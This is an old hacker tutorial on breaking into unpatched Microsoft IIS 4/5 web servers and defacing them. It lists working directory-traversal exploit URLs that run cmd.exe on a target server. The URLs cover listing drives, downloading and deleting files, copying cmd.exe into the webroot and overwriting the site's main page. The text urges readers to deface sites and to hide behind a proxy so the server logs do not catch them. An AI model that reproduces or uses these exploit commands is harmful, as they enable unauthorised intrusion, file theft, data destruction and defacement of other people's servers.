Hacking/Cracking IIS 4/5


All the stuff work on IIS 4,5 servers with
with out any security updates!

maac@mail1.stofanet.dk Made By Truti |

************ INTRO:

Hacking an iis server is pretty much like taking candy from a baby.
No really its that easy. In this tutorial im going to walk you through 0wnz'ing
your very own iis server and show you haw to deface the site but i seriously dont
encourage this. I dont agree with needless defacing unless its your first time,
but im not against defacing to stand up for your rights, punish a site with bad
intensions(even though the site can be rebuilt) or to make a strong point. If your
going to use the *i defaced your site because it had bad security*, you could just
as easily mail the admin. Im telling you all how to do this so u know how easy it
is. Please dont abuse the information i give you.

---------------------------------------------
************ Finding vulnerable servers:

There are *many , many* vulnerabilities with iis but im going to discuss one of the
latest. This vulnerability allow the execution of arbituary code.
To see if a site is vulnerable try these links

www.TARGET.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.e
xe?/c+dir+c:\

www.TARGET.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.e
xe?/c+dir+c:\

www.TARGET.com/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.e
xe?/c+dir+c:\

If the server is vulnerable you should get a listing of the C drive.
If none of these links work, the server probably isn't vulnerable.

Ok, so lets say you got a list or the c content, it should look something like:

---------------------------------------------
Directory of c:\

11/15/02 08:50a (DIR) WINNT
11/15/02 09:15a (DIR) Program Files
11/15/02 09:20a (DIR) TEMP
11/15/02 09:21a (DIR) CPQ SYSTEM
11/15/02 09:50a (DIR) Inetpub
11/27/02 08:11a (DIR) CPQSUPSW
11/29/02 09:12a (DIR) CA_LIC
12/01/02 09:42a 140 server ip address.txt
04/06/02 04:44p 55,769 systemlog 06-04.txt
05/04/02 12:32p (DIR) test

10 File(s) 1,159,703,933 bytes
1,322,123,264 bytes free
---------------------------------------------

To navigate just change the links to:
/system32/cmd.exe?/c+dir+c:\winnt
For example to navigate to the WINNT directory

To navigate to a folder such as CPQ SYSTEM you would have to put:
/system32/cmd.exe?/c+dir+c:\cpqsys~1
There must be six characters before the ~1 and no spaces (Normal rules DOS). Use DOS on
your (or where ever there is a win32 b0x) own pc, this will greatly help you when it
comes to using simple commands such as copy, or listing content of a directory.

Now in order to find the main page of the website. We must find the webroot. The webroot
is the path in which all the files for the site are held, including the main page. In my
experience the webroot is usually found on the D: drive but it can be any directory the
admin chooses.

Try:
/system32/cmd.exe?/c+dir+d:\
This should list the content of the drive D drive. Also a good tip, a lot of sites have
*mock* webroots, in which you think you have found the sites main page but its not really,
just a copy. You will have to visit the site and find the size of the main page and the
other pages linked to it (right click and click properties - Normal win32 trik) and then
match it up with the files in the webroot to find the real main page.

---------------------------------------
Now is a good time to give you some commands that will come in useful:

To list all chosen files on the server use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever

To DOWNLOAD a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file

When asked: What would you like to do with this file? choose: *run this program from its
current location*. Choosing save to disk will get you a properties report of that file or
something like that.

To DELETE (del) a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20del%20c:\whatever.file

To make a text file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20echo%20You txt goes here!!!!!>%20test.txt

--------------------------------------
************ Changing the mainpage.htm

Now on to the important part, editing the websites main page. HTML is not needed but if
you want to an in any way decent looking deface you need to know it. If you dont know it
dont worry and text in a file with .htm or .html extension will show up in a browser. If
you want to learn html it can be done by anybody, i learned the basics in about 1 day.
Ok, enough woman - girlie! talk, to the man stupid - you have to copy the file CMD.exe to
the directory with the page in it, lets call this page, wannabie_admin.html and lets say
the directory wannabie_admin.html is in is C:\home\site

So the COPY command:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe
That will copy CMD.exe (like command.com in win98) to d:\home\site

now to paste the text we want into wannabie_admin.html:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wa
nnabie_admin.html

Now your text should now be on the main page. If you echo html code into wannabie_admin.h
tml, youll get a much better defacement. If your are going to do it, do it RIGHT!

--------------------------------------
Please, please listen to me, IIS servers >>>-LOG-<<< all the stuff! so use a >>>-PROXY-<<<
or else pay the price!
--------------------------------------
BTW. a very use full tool are the Twwwscan... It can be found at www.google.com!


Credits

maac@mail1.stofanet.dk Made By Truti